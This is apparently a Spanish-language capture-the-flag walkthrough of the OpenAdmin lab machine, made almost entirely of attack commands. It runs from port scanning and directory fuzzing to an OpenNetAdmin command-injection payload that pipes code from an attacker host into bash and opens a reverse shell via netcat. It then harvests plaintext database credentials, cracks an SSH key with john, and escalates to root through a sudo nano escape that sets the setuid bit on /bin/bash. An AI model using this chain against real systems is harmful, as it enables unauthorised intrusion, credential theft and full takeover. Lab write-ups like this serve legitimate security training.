nmap -A -p- -oA openadmin 10.129.247.237 --min-rate=10000 --script=vuln --script-timeout=15 -v

nmap -sC -sV -O -p- -oA openadmin 10.129.247.237

nmap -sU -O -p- -oA openadmin-udp 10.129.247.237

nikto -h 10.129.247.237:80

Pasted image 20210816133925.png

nmap -sCV -p80,443 10.129.247.237 -oN targeted

Pasted image 20211103072824.png

whatweb http://10.129.247.237

Pasted image 20211103072915.png

wfuzz -c -t 200 --hc=404 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt http://10.129.247.237/FUZZ

Pasted image 20211103073758.png

http://10.129.247.237/artwork

Pasted image 20211103073838.png

http://10.129.247.237/music y le damos click a login

Pasted image 20211103074059.png

searchsploit poennetadmin

searchsploit -m 47691

Pasted image 20211103074307.png

curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";curl 10.10.14.92|bash;echo \"END\"&xajaxargs[]=ping" "http:10.129.247.237/ona"

python3 -m http.server 80

nc -lvnp 443

Pasted image 20211103080315.png

find \-name user.txt 2>/dev/null

cd /opt/ona/www

find \-type f 2>/dev/null | grep "config"

Pasted image 20211103080928.png

cat ./local/config/database_settings.inc.php

Pasted image 20211103081035.png

credenciales jimmy:n1nj4W4rri)R!

su jimmy

cat main.php

curl localhost:52846/main.php

Pasted image 20211103082314.png

Copiamos la llave y lo ponemos en id_rsa

/usr/share/john/ssh2john.py id_rsa

/usr/share/john/ssh2john.py id_rsa > hash

Pasted image 20211103084146.png

credenciales joanna:bloodninjas

john --wordlist=/usr/share/wordlists/rockyou.txt hash

chmod 600 id_rsa

ssh -i id_rsa joana@10.129.247.237

Pasted image 20211103084403.png

sudo -l

sudo -u root nano /opt/priv

Pasted image 20211103084811.png

Ctrl R + Ctrl X

Pasted image 20211103085137.png

En nano ejecutamos chmod 4755 /bin/bash

Pasted image 20211103085429.png

bash -p

Pasted image 20211103085654.png

boxes

copyright©2022 Cu3rv0x all rights reserved